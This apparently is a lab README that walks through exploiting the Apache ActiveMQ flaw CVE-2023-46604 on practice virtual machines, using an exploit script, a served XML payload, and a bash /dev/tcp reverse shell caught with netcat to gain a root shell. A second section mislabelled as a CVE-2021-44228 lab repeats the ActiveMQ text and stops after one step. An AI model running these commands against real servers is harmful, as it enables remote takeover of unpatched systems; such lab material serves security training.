CVE-2023-46604 Lab

This lab guides on exploiting vulnerabilities of CVE-2023-46604

Acknowledgements

• Apache ActiveMQ
• CVE-2023-46604

Environment

This lab requires the installation of 2 virtual machines. One Kali Linux machine version 2023.4 and one Ubuntu machine version 22.04.3 LTS. You can download them here:

• Kali Linux 2023.4
• Ubuntu 22.04.3 LTS
• VMware-workstation-17.5.0 for windows
• VMware-workstation-17.5.0 for linux
• Key active VMWare 17 pro

Documentation

Documentation

Model and system requirements

On Kali Linux machine:

• Install git

$sudo apt install git

• Install gedit

$sudo apt install gedit

• Install python (already available on kali linux)
• Install Netcat (already available on kali linux)

On Ubuntu machine:

• Install git

$sudo apt install git

• Install openjdk 18

$sudo apt install openjdk-18-jdk

• Install ActiveMQ 5.18.2 package

$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Exploiting

Step 1: Launch the activemq service on the Ubuntu machine

Open a terminal window and run the command as below:

$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Check the status of the service:

$./activemq status

If the service starts successfully, it will display on the terminal screen as "ActiveMQ Brocker is running".

You can also visit http://127.0.0.1:8161 to open ActiveMQ broker manager.It includes the hostname, version, ID, up time and some other information.

Step 2: Set up on Kali Linux machine to attack

Download resources for the exploiting process:

$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

As you can see, we have 2 files exploit.py and poc.xml:

• The poc.xml file contains a piece of malicious code that takes advantage of a vulnerability in the OpenWire protocol.
• The exploit.py file is responsible for HTTP encrypting and sending the poc.xml file to Brocker on the target machine. Open a web server at the resource path:

$cd CVE-2023-46604
$python3 -m http.server

Open a new terminal window to send the poc.xml file to the target's server via the exploit.py file:

$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

After the command is executed, the Calculator application is launched on the target machine. This proves that the vulnerability has been successfully exploited. We continue to create a reverse shell to control the target machine.

Open a new terminal window to listen for reverse shell connections:

$sudo su
$nc -nlvp 4444

Return to the previous terminal and edit the poc.xml file:

$gedit poc.xml

Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file.

Sending malicious code again:

$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

The result of this command is that we have obtained the root shell on the target machine.

CVE-2021-44228 Lab

Acknowledgements

• Apache ActiveMQ
• CVE-2023-46604

Environment

This lab requires the installation of 2 virtual machines. One Kali Linux machine version 2023.4 and one Ubuntu machine version 22.04.3 LTS. You can download them here:

• Kali Linux 2023.4
• Ubuntu 22.04.3 LTS
• VMware-workstation-17.5.0 for windows
• VMware-workstation-17.5.0 for linux
• Key active VMWare 17 pro

Documentation

Documentation

Model and system requirements

On Kali Linux machine:

• Installed git

sudo apt install git

• Installed gedit
• Installed python
• Installed Netcat

On Ubuntu machine:

• Installed git
• Installed openjdk 18
• Installed ActiveMQ 5.18.2 package

Exploiting

Step 1: On the Ubuntu machine, launch the activemq service

Support

For support, email dcm240602@gmail.com or txc3000@gmail.com

Authors

• @dcm2406
• @txc3000